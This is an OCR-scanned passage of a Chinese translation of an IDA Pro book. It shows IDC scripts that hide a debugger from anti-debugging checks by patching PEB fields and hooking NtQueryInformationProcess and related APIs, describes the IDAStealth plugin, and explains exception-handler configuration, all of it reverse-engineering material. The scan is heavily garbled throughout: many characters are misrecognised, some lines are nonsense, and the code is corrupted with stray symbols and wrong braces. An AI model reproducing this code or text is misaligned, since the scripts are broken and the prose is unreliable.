的 名 称 。 本 书 的 网 站 提供 了 一 个 基于 这 个 概念 的 脚本 ( RebuildImports.idc/RebuidImports.py )。 这 
其 中 的 任何 一 个 脚本 都 可 以 代替 renimp.idc， 而 且 效 果 几 乎 完全 相同 。renimp.idc 在 处 理 名 称 中 包 
含 下 划 线 字符 的 模块 时 遇 到 的 问题 也 得 以 避免 , 因为 这 时 的 函数 名 称 是 下 接 从 进程 内 存 空间 中 的 
导出 表 中 提取 出 来 的 。 

为 每 一 个 导 人 表 条 目 正 确 命名 的 效果 还 会 直接 在 反 汇 编 代 码 清 单 中 反映 出 来 , 如 下 面 自动 更 
新 的 反 汇 编 代 码 清单 所 示 : 


























UPX0:00403C5B call ds:RtlFreeHeap 
UPX0:00403C61 test eax, eax 

UPX0:00403C63 jnz short loc 403C7B 
UPX0:00403C65 call sub 40230F 
UPX0:00403C6A mov esi, eax 

UPX0:00403C6C call ds:RtlGetLastWin32Error 











每 一 个 重 命名 后 的 导入 表 条 目的 名 称 应 用 到 了 调用 导入 函数 的 所 有 位 置 , 这 进一步 提高 了 反 
汇编 代码 清单 的 可 读 性 。 值 得 注意 的 是 , 你 在 使 用 调试 名 时 所 作 的 任何 格式 化 更 改 也 会 目 动 应 用 
到 数据 库 视 图 中 。 换 言 之 ， 你 不 需要 提 摄 内 存 快 照 来 捕获 你 所 作 的 格式 化 更 改 。 使 用 内 存 快 照 的 
目的 是 将 内 存 内 容 〈 人 代码 和 数据 ) 从 进程 地 址 空间 移 回 IDA 数据 库 中 。 














25.3.4 隐藏 调试 器 


有 许多 方法 可 以 阻止 你 将 调试 器 作为 去 模糊 工具 使 用 ， 其 中 一 个 常见 的 方法 叫做 调试 器 检 
测 。 模 糊 工 具 的 作者 也 认识 到 , 用 户 可 以 使 用 调试 器 撤销 他 们 辛苦 劳动 的 成 果 。 为 应 对 这 种 情况 ， 
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如 末 他 们 的 工具 检测 到 调试 入， 他 们 将 采取 措施 阻止 这 些 工具 运行 。 我 们 已 经 在 第 21 草 讨 论 过 
一 些 调试 器 检测 方法 。 如 第 21 章 所 述 ，Nicolas Falliere 的 文章 “Windows Anti-Debug Reference" ^ 
全 面 介绍 了 大 量 特定 于 Windows 的 调试 硕 检 测 技巧 。 通 过 使 用 一 段 简单 的 脚本 来 局 动 调试 六 会 
话 ， 并 目 动 配置 一 些 断 点 ， 你 就 可 以 避 开 其 中 的 一 些 检测 技巧 。 虽然 我 们 可 以 使 用 Python 来 避 
免 这 些 技 巧 ， 但 最 终 还 是 会 使 用 条 件 断 点 ， 而 我 们 只 能 用 IDC 来 指定 条 件 断 点 。 因 此 ， 下面 的 
示例 均 以 IDC 编写 。 

为 了 从 脚本 局 动 调试 会 话 ， 前 先 运 行 下 面 的 代码 : 





auto n; 
for (n = 0; n < GetEntryPointOty(); n++) 1 
auto ord = GetEntryOrdinal(n); 
if (GetEntryName(ord) == "TlsCallback 0") ( 
AddBpt (GetEntryPoint(ord)); 
break; 


j 


RunTo(BeginEA()); 
GetDebuggerEvent(WFNE SUSP, -1); 


这 些 语句 检查 TLS 调用 了 哺 数 是 否 存 在 ,设置 断 点 ( 如 果 有 的 话 )， 然 后 启动 调试 锅 ， 请 求 在 
入 口 点 地 址 处 中 止 ,然后 等 待 操作 完成 ( 严格 来 讲 , 我 们 还 应 当 测 试 GetDebuggerEvent 的 返回 值 )。 
一 旦 我 们 的 脚本 重新 获得 控制 权 , 我 们 将 拥有 一 个 处 于 活动 状态 的 调试 硕 会 话 , 我 们 希望 调试 的 
进程 将 与 它 依赖 的 所 有 库 一 起 映射 到 内 存 中 。 

我 们 需要 避 开 的 第 一 个 调试 右 检 测 是 进程 环境 块 (PEB ) 中 的 IsDebugged 字段 。 这 是 一 个 1 
字 节 字段 ， 如 果 进 程 正 接受 调试 ， 它 就 被 设 为 1， 否则 设 为 0。 这 个 字段 位 于 PEB 中 的 第 二 个 字 
他， 因此 我 们 所 需要 做 的 就 是 找到 PEB， 并 将 适当 的 字 市 修补 为 0 即 可 。 同 时 ， 这 个 字段 也 是 
Windows API Ki% IsDebuggerPresent 测试 的 字段 ， 因 此 我 们 可 以 设法 取得 “一 石 二 马 ” 的 效果 。 
如 有 果 我 们 知道 已 经 停 在 了 与 TLS 回调 相对 的 程序 入 口 点 ， 找 到 PEB 的 位 置 其 实 相 当 人 简单 ， 因 为 
在 进入 进程 后 ，EBX 寄存 器 中 即 包 含 一 个 指向 PEB 的 指针 。 但 是 ， 如 果 进 程 已 在 TLS 回调 函数 
处 停止 ， 那 么 我 们 需要 采用 一 种 更 为 稼 规 的 方法 来 查找 PEB。 我 们 将 采用 与 shellcode 和 模糊 带 
中 常用 的 类 似 的 方法 。 基 本 思想 就 是 定位 当前 线程 信息 块 (TIB ) ”， 然 后 跟踪 移入 指针 来 查找 
PEB。 下 面 的 代码 可 以 定位 PEB 并 对 相关 字 节 进行 适当 的 修补 : 





























auto seg; 

auto peb - 0; 

auto tid = GetCurrentThreadId(); 

auto tib = sprintf("TIB[X08X]", tid); //IDA naming convention 
for (seg = FirstSeg(); seg !- BADADDR; seg = NextSeg(seg)) { 


if (SegName(seg) == tib) { 


(D 参见 http://www.symantec.com/connect/articles/windows-anti-debug-reference/ ; 


D 该 块 也 称 为 线程 环境 块 。 
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peb = Dword(seg + 0x30); //read PEB pointer from TIB 
break; 


} 


} 
if (peb != 0) { 

PatchDbgByte(peb + 2, 0); //Set PEB!IsDebugged to zero 
j 





值得 注意 的 是 , TE IDA 5.5 Bi, IDA 并 未 引入 PatchDbgByte 9. "CD IDA 5.5 之 前 的 
版 本 时 ， 我 们 可 以 使 用 PatchByte 函数 ， 如 果 数 据 库 中 存在 指定 的 地 址 ， 该 函数 也 会 对 数据 库 进 
行 修改 (修补 )。 

Falliere 的 文 草 中 提 到 的 男 一 种 反 调 试 技巧 是 测试 PEB 的 名 为 NtGlobalFlags 的 为 一 个 字段 
中 的 几 个 位 。 这 些 位 与 进程 的 堆 的 操作 有 关 ， 如 果 一 个 进程 正 被 调试 ， 则 它们 被 设 为 1。 假设 变 
量 peb 继续 以 前 面 的 示例 设置 ， 下 面 的 代码 从 PEB 中 获取 NtGlobalFlags 字段 ,重新 设置 造成 问 
题 的 位 ， 并 将 标志 存储 到 PEB 中 。 























globalFlags = Dword(peb + 0x68) & "0x70; //read and mask PEB.NtGlobalFlags 
PatchDword(peb + 0x68, globalFlags); //patch PEB.NtGlobalFlags 





Falliere 的 文 草 中 提 到 的 一 些 技巧 利用 了 有 进程 被 调试 与 没有 进程 被 调试 时 系统 子 数 返回 的 
言 息 之 间 的 差异 。 文 章 中 提 到 的 第 一 个 函数 为 NtQueryInformationProcess， 位 于 ntdll.dll P, f 
用 这 个 函数 ,进程 可 以 请 求 与 它 的 ProcessDebugPort 有 关 的 信息 。 如 果 这 个 进程 正在 被 调试 , 该 
RAR PENISE; 如 果 它 没有 被 调试 , MUZE BR CHR [n ELI TJA o 要 避 倪 这 种 形式 的 检测 ， 
可 以 在 NtQueryInformationProcess 返回 的 地 方 设置 一 个 断 点 ， 然 后 指定 断 点 条 件 子 数 来 过 滤 
ProcessDebugPort 请 求 。 我 们 采取 以 下 步骤 来 自动 定位 这 里 的 指令 。 

(1) 查询 NtQuery InformationProcess 的 地 址 。 

(2) Æ NtQueryInformationProcess 上 设置 断 点 。 

(3) 添加 一 个 断 点 条 件 以 调用 我 们 将 其 命名 为 bpt NEQueryInformationProcess 的 函数 ， 每 次 
调用 NtQueryInformationProcess DAHL rr BRL 

要 查找 NtQueryInformationProcess BH, RIE (Oft RROK dréi Gd äert oe 5 2J 
ntd11_NtQueryInformationProcess。 配 置 必要 断 点 的 代码 如 下 所 示 : 

















func = LocByName("ntdll NtQueryInformationProcess"); 
AddBpt ( func) ; 
SetBptCnd(func, "bpt NtQueryInformationProcess()"); 


我 们 所 需要 做 的 是 执行 断 点 函数 , E ZE EAERI aro PROC NtQuery- 
InformationProcess 的 原型 如 下 所 示 : 
NTSTATUS WINAPI NtOueryInformationProcess( 


in HANDLE ProcessHandle, 
e in PROCESSINFOCLASS ProcessInformationClass, 
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o out PVOID ProcessInformation, 


| in ULONG ProcessInformationLength, 
. out opt PULONG ReturnLength 


); 


该 函数 通过 在 ProcessInformationclass 参数 中 提供 一 个 整数 查询 标识 符 (@ ), 以 请 求 与 进程 有 
关 的 信息 。 信息 通 过 ProcessInformation 参数 指 回 的、 用 户 提 供 的 缓冲 区 返回 Ce ), 调用 方 可 以 传 
递 枚 举 背 量 ProcessDebugPort ( 值 7)， 以 查询 一 个 给 定 进程 的 调试 状态 。 如 果 一 个 进程 正 被 一 个 用 
户 空 间 调试 器 调试 ， 则 通过 所 提供 的 指针 传递 的 返回 值 将 为 非 零 值 ， 如 果 这 个 进程 没有 被 调试 ， 则 
返回 值 为 零 。 一 个 始终 将 ProcessDebugPort 的 返回 值 设置 为 零 的 断 点 函数 如 下 所 示 : 




















#define ProcessDebugPort 7 
static bpt NtQueryInformationProcess() { 
auto p ret; 
if (Dword(ESP + 8) == ProcessDebugPort) (//test ProcessInformationClass 
p ret = Dword(ESP + 12); 
if (p ret) 1 
PatchDword(p ret, 0); //fake no debugger present 

} 


EIP = Dword(ESP); X //skip function, just return 
ESP = ESP + 24; //stdcall so clear args from stack 
EAX = 0; //signifies success 


j 


return 0; //don't pause at the breakpoint 


ooo 0000 


J 


如 前 所 述 ， 这 个 函数 在 每 次 调用 NtQueryInformationProcess DIr. XAT, Rts f S iA 
函数 的 返回 地 址 ， 这 个 地 址 位 于 传递 给 NtQueryInformationProcess DI 5 个 参数 的 顶部 。 该 断 点 
PRAE AC ker ProcessInformationClass 的 返回 值 ， 以 确定 调用 方 是 否 正 请 求 ProcessDebugPort 
GB ( @ )。 如 果 调 用 方正 请 求 ProcessDebugPort, ， 则 该 函数 继续 执行 ， 获 取 返 回 值 指针 ( 6), 
检查 它 是 否 为 非 零 ( @ )， 最 后 保存 一 个 零 返 回 值 (1@ )， 从 而 达到 隐藏 调试 器 的 目的 。 为 了 跳 过 
该 函数 的 剩余 部 分 ， 随 后 会 通过 读 取保 存 的 返回 地 址 ( @ ) 来 修改 EIP， 然 后 调整 ESP 以 模拟 
stdcall 返回 (@ )。NtQueryInformationprocess 返回 一 个 NTSTATUS 码 ， 它 在 返回 前 于 @ 人 处 设 
置 为 0 (成 功 )。 

Falliere 的 文章 中 提 到 的 另 一 个 函数 是 NtSetInformationThread， 你 也 可 以 在 ntdll.dll 中 找到 
这 个 函数 。 该 函数 的 原型 如 下 所 示 : 


























NTSTATUS NtSetInformationThread( 
IN HANDLE ThreadHandle, 
IN THREADINFOCLASS  ThreadInformationClass, 
IN PVOID ThreadInformation, 
IN ULONG ThreadInformationLength 
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有 一 种 反 调 试 技巧 , 它 将 ThreadHideFromDebugger 值 传递 到 ThreadInformationClass 参数 中 ， 
它 会 使 线程 脱离 调试 希 。 要 避 开 这 种 技巧 ,我 们 需要 使 用 和 前 一 个 例子 一 样 的 基本 设置 。 最 后 的 
设置 代码 如 下 所 示 : 





func = LocByName("ntdl] NtSetInformationThread"); 
AddBpt(func ) ; //break at function entry 
SetBptCnd(func, "bpt NtSetInformationThread()"); 


相关 的 断 点 函数 如 下 所 示 : 


#define ThreadHideFromDebugger 0x11 
static bpt NtSetInformationThread() 1 
if (Dword(ESP + 8) == ThreadHideFromDebugger) (//test ThreadInformationClass 
EAX = 0; //STATUS SUCCESS 
EIP = Dword(ESP); //just return 
ESP = ESP + 20; //simulate stdcall 
j 


return 0; 


GK: 


} 


我 们 测试 ThreadInformationClass 参数 的 值 ( @ )， 并 扣 开 水 数 正文 (如 果 用 户 已 经 指定 
ThreadHideFromDebugger )。 通 过 设置 我 们 期 望 的 返回 值 (@ )， 并 从 栈 中 读 取 保存 的 返回 值 来 修 
改 指令 指针 ( @ )， 从 而 避 开 函数 体 。 我 们 通过 对 ESP 进行 20 字 节 的 调整 ( @ ) 来 模拟 stdcall 
返回 。 

我 们 最 后 讨论 的 函数 为 kernel32.dll 中 的 OutputDebugStringA, Falliere 在 他 的 文章 中 介绍 了 
如 何在 反 调试 技巧 中 应 用 这 个 阴 数 。 该 函数 的 原型 如 下 所 示 : 











void WINAPI OutputDebugStringA( 
. in opt LPCTSTR lpOutputString 


)5 


在 这 个 例子 中 ，WINAPI 是 _stdcall1 的 同义词 ， 用 于 指定 OutputDebugStringA 使 用 的 调用 约 
Eo 严格 来 讲 , 这 个 函数 并 没有 返回 值 , 因为 它 的 原型 指定 的 是 void 返回 类 型 ,但 是 , 据 Falliere 
的 文 曹 讲述， 如果 没 有 调试 硕 依 附 于 正 被 调用 的 进程 , 这 个 困 数 返回 1; 如 果 在 调试 融 正 依附 于 
被 调用 的 进程 时 ， 该 函数 被 调用 ， 则 它 “ 返 回 ” 作 为 参数 传递 的 字符 串 的 地 址 。 正 常情 况 下 ， 
如 果 _stdcall 图 数 确 实 返回 一 个 值 ， 那 它 应 该 返回 EAX 寄存 需 中 的 值 。 由 于 在 OutputDe- 
bugStringA 返回 时 ，EAX 必须 保存 某 个 值 ， 因 此 ， 我 们 可 以 认为 这 个 值 就 是 该 限 数 的 返回 值 。 
但 是 , 由 于 正式 的 返回 类 型 为 void, 因此 没有 文档 资料 或 保证 书 指出 这 时 EAX 到 底 保 存 的 是 什 
么 值 。 这 个 特殊 的 反 调 试 技巧 只 是 依赖 于 观察 到 的 函数 行为 。 为 阻止 观察 到 的 返回 值 发 生变 化 ， 
我 们 可 以 设法 确保 在 0utputDebugStringA 返回 时 ，EAX 包含 值 1。 下 面 的 IDC 代码 用 于 实施 这 
个 技巧 : 











func = LocByName("kernel32 OutputDebugStringA"); 
AddBpt ( func) ; 
//fix the return value as expected in non-debugged processes 
//also adjust EIP and ESP 
€ SetBptCnd(func, "!I((EAX = 1) 88 (EIP = Dword(ESP)) 8& (ESP = ESP + 8))"); 


这 个 例子 使 用 和 前 一 个 例子 相同 的 技巧 自动 定位 OutputDebugStringA RAIA RABA o 1H. 
是 , 与 前 一 个 例子 不 同 ， 到 达 断 点 后 你 需要 做 的 工作 在 一 个 IDC RAR C @ ) 中 指定 就 可 以 了 
(不 需要 专门 的 函数 ) 在 这 个 例子 中 ， 崭 点 表达 式 修改 (注意, 这 里 是 赋值 而 不 是 比较 ) EAX 
寄存 句 ， 以 确保 它 在 函数 返回 时 包含 值 1， 并 且 也 能 调整 EIP 和 ESP 以 避 开 该 函数 。 我 们 取消 
了 上 肠 点 条 件 ， 以 在 所 有 情况 下 均 跳 过 断 点 ， 因 为 布尔 “与 ”表达 式 的 结果 应 始终 为 非 零 值 。 

本 书 的 网 站 包含 一 个 脚本 ( HideDebugger.idc )， 它 将 我 们 在 这 一 节 介 绍 的 所 有 要 素 组 合 到 一 
个 有 用 的 工具 中 , 用 于 局 动 调试 会 话 ， 并 同时 采取 措施 来 阻止 反 调 试 。 欲 了 解 更 多 有 关 隐 藏 调试 
isi, WAW Ilfak 的 博客 ， 其 中 介绍 了 几 种 隐藏 技巧 ”。 

















25.4 IDAStealth 


虽然 前 一 市 讨论 的 HideDebugger 脚本 有 助 于 说 明 调试 套 的 基本 编程 功能 及 “ 钩 住 ” 库 师 数 
的 一 些 基础 知识 , 但 鉴于 现 有 反 调 试 技巧 的 庞大 数量 以 及 这 些 技巧 的 复杂 程度 , 我 们 需要 更 加 强 
大 的 防 反 调 试 功 能 ,而 这 种 功能 却 是 简单 的 脚本 所 无 法 提供 的 。 笠 好 IDAStealth 插件 可 满足 我 们 
对 于 强大 的 调试 硕 隐 北 功 能 的 需求 。IDAStealth 由 Jan Newger 编写， 是 Hex-Rays 2009 年 度 插件 
编写 苑 客 的 冠军 捅 件 。 该 插件 以 C++ 编写， 并 提供 源 代码 和 二 进 制 两 个 版 本 。 











SS 25-1 IDAStealth 插件 


名 称 IDAStealth 

作者 Jan Newger 

发 布 C++ 源 代码 与 二 进 制版 本 

价格 免费 

描述 Windows 调试 硕 隐 藏 插件 

信息 http://www.newgre.net/idastealth/ 


IDAStealth 的 二 进 制 组 件 由 一 个 插件 与 一 个 帮助 程序 库 组 成 ， 这 两 个 插件 都 必须 安 猜 到 
«IDADIR»/plugins 目录 中 。 激 活 后 ，IDAStealth 将 显示 如 图 25-6 所 示 的 配置 对 话 框 。 


(D 参见 http://www.hexblog.com/2005/11/simple trick to hide ida debug.html, http://www.hexblog.com/2005/11/stealth | 
plugin l.html 和 http://www.hexblog.com/2005/11/the ultimate stealth method 1.html。 
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IDAStealth v1.3 X] 














Driver Configuration | Other Options | About IDAStealth | 
Stealth Techniques (1) Stealth Techniques (2) 
Common Stealth Techniquca 








NtQueryObject (Fake number of debug ports) 
RtGetNtGlobalFlags (Prevent debug heap initialization) 


NtQueryInformationProcess (Includes CheckRemoteDebuggerPresent) 
GetTickCount - Increase each time by random value from range: 0- [ ` 
Advanced HW BP protection (Context APIs/KiUserExceptionDispatcher) 
Getyersion + GetVersionEx + Verify'ersionInfo (Pretend WinXP SP3) 
Improved NtClose (Skip KiRaisellserExceptionDispatcher) 










Disable Hags 
IsDebuggerPresent (Patch PEB.BeingDebugged) 
NtGlobalFlag (Patch global heap flags) 

HeapFlag + FarceFlag (Patch other heap flags) 


Global Erable 
Enable stealth when debugger starts 
[ ] Enable stealth when debugger attaches 


图 25-6 IDAStealth 配置 对 话 框 


你 可 以 使 用 几 个 包含 大 量 选 项 的 选项 卡 来 确定 采用 哪些 防 反 调试 技巧 。 激 活 后 ，IDAStealth 





将 开始 规避 几乎 每 一 种 已 知 的 调试 大 检测 技巧 ， 包 括 那 些 在 Falliere 的 文章 中 讨论 的 技巧 以 及 由 
之 前 开发 的 HideDebugger.idc 脚本 解决 的 技巧 。 


25.5 “处理 异常 


有 时 候 ， 程 序 希 望 目 行 处 理 它们 在 执行 过 程 中 生成 的 任何 异 第 。 如 第 21 章 所 述 ， 模 糊 程序 
常常 有 意 生 成 异常 ， 以 此 作为 一 种 反 控 制 流 和 反 调 试 技巧 。 但 异常 通常 表示 存在 问题 ， 而 调试 需 
的 目的 则 是 帮助 你 解决 这 些 问 题 。 因 此 ,调试 硕 往 往 硕 望 处 理 在 程序 运行 过 程 中 发 生 的 所 有 异 篆 ， 
以 帮助 你 找到 bug。 

如 条 程序 硕 望 目 行 处 理 异 冲 ,， 我 们 需要 阻止 调试 大 拦截 这 些 异 稼 ， 或 者 在 异 稼 被 拦截 时 ， 我 
们 至 少 需要 采取 办 法 ， 让 调试 硕 将 异 稼 转交 给 我 们 控制 的 进程 。 好 在 IDA 的 调试 硕 能 够 传递 各 
个 异常 ， 或 者 目 动 传递 指定 类 型 的 所 有 异常 。 

自动 异常 处 理 通过 Debugger 》 Debugger Options 命令 配置 ， 其 对 话 框 如 图 25-7 所 示 。 

我 们 可 以 配置 几 个 事件 上 自动 中 止 调试 闫 ， 并 可 以 将 大 量 事件 目 动 记 录 到 IDA 的 消息 窗口 中 ， 
除 此 以 外 ,“ 调 试 需 设置 ”对 话 框 可 用 于 配置 调试 硕 的 异 稼 处 理 行为 。Edit exceptions 按钮 打开 如 
图 25-8 所 示 的 寞 第 配置 对 话 框 。 
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x 


Events 
[ Stop on debugging start 


[ Stop on process entry point 
[ Stopon thread start/exit 
[ stop on library load/unload 
[ Stop on debugging message 


Log 
[ Segment modifications 


[vw Thread start/exit 


M Library load/unload 
[ Breakpoint 
hg Debugging message 


Options 
[ Reconstruct the stack 


[ Show debugger breakpoint instructions 





[ Autoload PDB files EXCEPTION ACCESS VIOLATION Debugger 
| Uk EN EXCEPTION. DATATYPE- MISALIGNMENT E Debugger 
EXCEPTION BREAKPOINT dere Debugger 
30000004 EXCEPTION SINGLE STEP Stop Debugger 
Edit exceptions | Reload exceptions | | CoO00008C EXCEPTION ARRAY BOUNDS EXCEEDED Stop Debugger 
| coooo08D EXCEPTION ET DENORMAL OPERAN2 Stop Debugger 

OK | PEU | Hep | | COOO008E EXCEPTION ET DIVIDE BY ZERO Stop Debugger ~| 


Line 3 of 26 








图 25-7 “调试 器 设置 ”对 话 框 图 25-8 ”异常 配置 对 话 框 
对 于 调试 带 已 知 的 每 一 种 寞 肖 类 型 ,这 个 对 话 框 列 出 了 一 个 特定 于 操作 系统 的 寞 肖 代 人 码 、 异 








第 的 名 称 、 调 试问 是 否 中 止 进程 (Stop/No )， 以 及 调试 各 是 否 会 处 理 异常 ,或 目 动 将 异常 传递 给 
应 用 程序 处 理 ( Debugger/Application )。<IDADIR>/cfg/exceptions.cfg 文件 中 包含 一 个 主要 异常 
列表 以 及 处 理 每 个 异 篆 的 默认 设置 。 此 外 , 这 个 配置 文件 中 还 包含 一 些 消 息 ， 如 采 调 试 融 正在 执 
行进 程 时 发 生 给 定 类 型 的 异 和 总 ， 这 些 消 息 将 显示 出 来 。 你 可 以 使 用 一 个 文本 编辑 器 编辑 
exceptions.cfg 文件 ,更 改 调试 需 的 默认 异常 处 理 行 为 。 在 exceptions.cfg 中 , 值 stop 和 nostop 用 
于 指出 : 当 一 个 给 定 异 篆 发 生 时 ， 调 试 需 是 否 应 将 进程 挂 起 。 

你 还 可 以 通过 异常 配置 对 话 框 编辑 各 个 异常 ,逐个 会 话 地 (也 就 是 说 ,在 打开 特定 数据 库 的 
同时 ) 配置 异常 处 理 。 要 修改 调试 右 对 于 一 个 给 定 异 常 类 型 的 行为 , 在 “ 措 背 配置 ”对 话 框 中 碳 
击 需 要 修改 的 异常 ， 并 选择 Edit， 得 到 的 “异常 处 理 ” 对 话 框 如 图 25-9 所 示 。 
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Code: DxCO000094 
Mame: EXCEPTION INT DIVIDE BY ZERO 





图 25-9 “RADIE” Mtb 
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其 中 的 两 个 选项 对 应 于 exceptions.cfg 文件 中 的 两 个 可 配置 选项 ， 你 可 以 为 任何 异常 配置 这 
些 选 项 。 通 过 第 一 个 选项 ,你 可 以 指定 ， 当 指定 类 型 的 异 币 发 生 时 ， 调 试 希 是 否 应 中 止 进程 ， 或 
者 执行 是 否 继续 。 需要 注意 的 是 ， 如 采 让 调试 右 处 理 异 浓 ， 人 允许 进程 继续 执行 会 导致 无 限 的 异常 
生成 循环 。 

通过 第 二 个 配置 选项 可 以 决定 ,是否 应 将 一 个 给 定 类 型 的 异 和 党 传递 给 被 调试 的 应 用 程序 ， 以 
便 该 应 用 程序 有 机 会 使 用 它 上 自己 的 异常 处 理 程序 处 理 这 个 异常 。 如 果 一 个 应 用 程序 的 正常 运行 需 
要 这 类 异常 处 理 程序 被 执行 ,你 应 该 选择 将 相关 类 型 的 异常 传递 给 该 应 用 程序 人 处理。 在 分 析 模 糊 
代码 ， 如 第 21 草 介 绍 的 tElock 实用 工具 ( 它 注册 有 它 自己 的 异常 处 理 程序 ) 生成 的 模糊 代码 时 ， 
你 可 能 需要 这 样 做 。 

除非 你 已 配置 IDA 继续 执行 并 癌 应 用 程序 传递 特定 的 异常 类 型 ， 否则 IDA 将 暂 仿 执行 ， 并 
在 发 生 异 党 时 间 你 报告 异常 。 如 果 你 选择 继续 执行 程序 , IDA 将 显示 如 图 25-10 所 示 的 Exception 
Handling ( 异常 处 理 ) 对 话 框 。 














和 Exception handling x| 


The execution will be resumed after the exception. 
Do you want to pass the exception to the application? 







If you answer yes, the application's exception handler 
will be executed if there is one. 
The control of the application might be lost. 


Change exception definition | 
| cm | 


图 25-10 Exception Handling 对 话 框 


这 时 ,你 可 以 选择 更 改 IDA 处 理 给 定 异 常 类 型 的 方式 ( Change exception definition )、 回 应 用 
程序 传递 异常 (Yes )， 或 允许 IDA 忽略 异常 (No )。 如 果 向 应 用 程序 传递 异常 ， 应 用 程序 将 使 用 
任何 已 配置 的 异常 处 理 程序 来 处 理 异 肖 。 如 采 选 择 “No”，IDA 将 笠 试 继续 执行 ,但 如 采 你 没有 
更 正人 负 员 引发 异常 的 条 件 ， 这 样 做 可 能 会 导致 故障 。 

如 采 你 正在 裔 历代 人 码 , 并 且 IDA 确定 你 即将 执行 的 指令 会 生成 异常 , 这 时 会 出 现 一 种 特 丈 情况， 
就 像 是 将 设置 跟踪 标记 的 int 3、icebp 或 popf 一 样 。 此 时 IDA 会 显示 如 图 25-11 所 示 的 对 话 框 。 

x| 


o The instruction at 41EAOA will set the trace bit or generate an exception. 





Do you want IDA to run the application without setting the trace bit? 
If yes, a regular exception will be generated. This corresponds 

to the application behaviour without a debugger (if the exception 
is not masked by the debugger). 


Depending on the exception handling settings, selecting "Hun" may 
lead to automatic execution of the application's exception handler. 
The control of the application might be lost. 


Oan | suene | 


[ Don't display this message again 





图 25-11 异常 确认 对 话 框 
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多 数 情 况 下 ，Run 选项 都 是 最 适当 的 选项 ， 如 果 没 有 依附 调试 器 ， 这 时 应 用 程序 会 看 到 它 所 
期 得 的 行为 ( 见 图 25-11 所 示 的 对 话 框 )。 通 过 此 对 话 框 ， 你 确认 某 个 异常 即将 生成 。 如 果 你 选 
FE Run， 你 会 立即 收 到 发 生 异 和 常 的 通知 ;， 当 你 继续 执行 时 ， 你 将 会 看 到 图 25-10 中 的 Exception 
Handling 对 话 框 ， 以 确定 应 如 何人 处 理 异 常 。 

要 确定 应 用 程序 如 何 处 理 寞 常 , 我 们 需要 了 人 解 如 何 跟 踊 异常 处 理 程序 , 这 又 需要 我 们 知道 如 
何 定位 异常 处 理 程序 。 在 一 篇 名 为 “Tracing exception handler”“ 的 博客 文章 中 ,llfak 讨论 了 如 何 
跟踪 Windows SEH 人 处理 程序 。 其 基本 的 概念 是 搜索 应 用 程序 的 已 安装 异常 处 理 程序 列表 ， 定 位 
其 中 有 用 的 异常 处 理 程序 。 对 于 Windows SEH 异常 ， 有 一 个 指向 该 列表 项 部 的 指针 ， 它 是 线程 
环境 块 (TEB ) 中 的 第 一 个 双 字 。 异 常 处 理 程序 列表 是 一 个 标准 的 链表 数据 结构 ， 其 中 包含 一 个 
指 癌 链 中 下 一 个 异常 处 理 程序 的 指针 ,以 及 一 个 指 癌 处理 生 成 的 异常 的 也 数 的 指针 。 异 常 在 列表 
中 由 一 个 处 理 程序 往 下 传递 给 男 一 个 处 理 程 序 ， 直 到 选中 一 个 处 理 程序 来 处 理 异 党 ,并 通知 操作 
系统 进程 将 继续 正常 执行 。 如 果 没 有 选中 已 安装 的 异常 处 理 程序 来 处 理 当前 的 异常 ， 则 操作 系统 
会 终止 进程 ,或 者 当 进 程 被 调试 时 ， 操 作 系 统 会 通知 调试 带 ， 被 调试 的 进程 中 发 生 了 一 个 异常。 

fr IDA 调试 器 中 ,TEB 被 映射 到 一 个 名 为 TTBINNNNNNNNJ] 的 IDA 数据 库 段 中 ,这 里 的 NNNNNNNN 
是 线程 标识 号 的 8 位 十 六 进 制 表 示 形 式 。 这 段 中 的 第 一 个 双 字 如 下 所 示 : 









































TIB 
TIB 
TIB 
© TIB 


000009E0 
000009E0 
000009E0 
000009E0 


:7FFDFooo TIB 000009EO0 segment byte public 'DATA' use32 
:7FFDF000 assume cs:TIB 000009EO0 ` 

:7FFDF000 ;org 7FFDFOOOh 

:7FFDF000 dd offset dword 22FFEO 


ma Bam mm m 
LL LLL. 





前 3 行 显 示 该 段 的 摘要 信息 ， 而 第 四 行 (@ ) 包含 该 段 的 第 一 个 双 字 ， 它 指出 : rk 
处 理 程序 记录 可 以 在 地 址 22FFE0h (offset dword 22FFE0 ) 处 找到 。 如 果 IDA 没有 为 这 个 特殊 的 
线程 安装 异常 处 理 程序 ， 则 TEB 中 的 第 一 个 双 字 将 包含 值 OFFFFFFFFh， 表 示 已 经 到 达 异 常 处 理 
程序 链 的 结尾 部 分 。 在 这 个 例子 中 ， 分析 地 址 22FFE0h 处 的 两 个 双 字 ， 得 到 以 下 结果 : 











Stack[000009E0]:0022FFEO0 @dword 22FFEO dd OFFFFFFFFh ; DATA XREF: TIB[000009E0]: 7FFDFOOO0N o 
Stack [000009E0] :0022FFE4 Odd offset loc 7C839AA8 


第 一 个 双 字 〈@ ) 包含 值 OFFFFFFFFh， 表 示 这 是 链 中 的 最 后 一 个 异常 处 理 程序 记录 。 第 二 个 
双 字 (0) 包含 地 址 7C839AA8h (offset loc 7C839AA8 )， 表 示 应 调用 loc 7C839AA8 处 的 函数 来 处 
理 进程 执行 过 程 中 发 生 的 任何 异常 。 如 果 要 跟踪 这 个 进程 如 何 处 理 异 和 常 ， 首 先 可 以 在 地 址 
7C839AA8h 处 设置 一 个 断 点 。 

由 于 搜索 SEH 链 是 一 个 相对 简单 的 任务 ， 调 试 需 可 以 执行 一 个 有 用 的 功能 : 在 一 个 窗口 中 
显示 为 当前 线程 安 猴 的 SEH 处 理 程序 链 。 通 过 这 样 一 个 窗口 ， 你 可 以 轻 多 导航 到 每 一 个 SEH 处 
理 程序 ， 这 时 你 可 以 决定 是 否 在 处 理 程序 中 插入 一 个 断 点 。 不 过 ， 这 是 OllyDbg 的 另 一 个 功能 ， 
而 IDA 的 调试 带 并 没有 这 个 功能 。 为 了 弥补 这 个 缺点 ， 我 们 开发 了 一 个 SEH 链 插件 ， 如 果 从 调 











(D 参见 http://www.hexblog.com/2005/12/tracing exception handlers.html。 
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Wd PH, xx itE n] dr fi D CB os AE SCREBU RI EH Y AU, Él 25-12 是 
这 个 窗口 的 一 个 示例 。 


SEH Chain of thread 0000 165C 


. except handler4 
sub 7784EDED 





Line 1of3 
图 25-12 SEH 链 窗 口 


这 个 插件 利用 SDK 的 choose2 胃 数 显示 一 个 非 模式 对 话 框 ， 列 出 当前 的 异 铺 处 理 程序 链 。 
对 于 每 一 个 已 安装 的 异常 处 理 程序 ， 对 话 框 显示 异常 处 理 程序 记录 的 地 址 ( 双 字 列表 记录 ) 及 对 
应 的 异常 处 理 程序 的 地 址 。 双 击 一 个 异常 处 理 程序 ， 活 动 反 汇 编 窗口 (IDA View-EIP 或 IDA 
